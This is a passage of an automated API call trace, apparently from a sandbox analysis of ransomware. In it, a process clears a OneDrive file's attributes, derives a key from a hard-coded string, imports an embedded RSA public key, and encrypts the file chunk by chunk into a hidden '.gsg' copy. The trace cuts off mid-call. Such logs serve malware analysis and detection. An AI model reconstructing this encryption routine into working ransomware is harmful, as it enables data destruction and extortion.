lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa608 [0270.744] FindNextFileA (in: hFindFile=0x2fa608, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0270.744] FindNextFileA (in: hFindFile=0x2fa608, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0270.745] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0270.745] GetLastError () returned 0x0 [0270.745] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\is\\filesync.localizedresources.dll.mui")) returned 0x20 [0270.747] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0270.748] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\is\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0270.749] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\is\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0270.750] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0270.751] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f26b38) returned 1 [0270.754] CryptCreateHash (in: hProv=0x2f26b38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0270.754] lstrlenA (lpString="gRZNKRGLTXaVulDshFSSTuldzMlQm") returned 29 [0270.754] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0270.754] CryptDeriveKey (in: hProv=0x2f26b38, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fa748) returned 1 [0270.754] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0270.754] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0270.754] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f27990) returned 1 [0270.755] CryptImportPublicKeyInfo (in: hCryptProv=0x2f27990, dwCertEncodingType=0x1, pInfo=0x2f31a70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f31aa0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f31aa8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fa3c8) returned 1 [0270.755] CryptEncrypt (in: hKey=0x2fa3c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0270.755] CryptEncrypt (in: hKey=0x2fa3c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f26a28*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f26a28*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0270.756] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f26a28*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f26a28*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0270.757] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.760] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.760] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.779] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.780] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.780] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.780] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.780] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.780] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.780] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.780] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.780] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.780] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.780] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.781] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.781] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.781] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.781] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.781] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.781] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.781] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.781] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.781] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.781] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.782] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.782] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.782] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.782] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.782] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.782] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.782] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.782] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.782] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.782] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.783] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.783] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.783] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.783] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.783] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.783] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.783] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.783] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.783] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.783] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.783] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.783] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.784] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.784] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.784] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.784] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.784] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.784] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.784] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.784] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.784] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.784] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.784] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.785] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.785] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.785] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.785] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.785] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.785] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.785] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.785] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.785] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.785] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.785] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.785] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.785] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.786] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.786] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.786] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.786] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.786] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.786] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.786] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.787] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.787] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.787] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.787] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.787] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 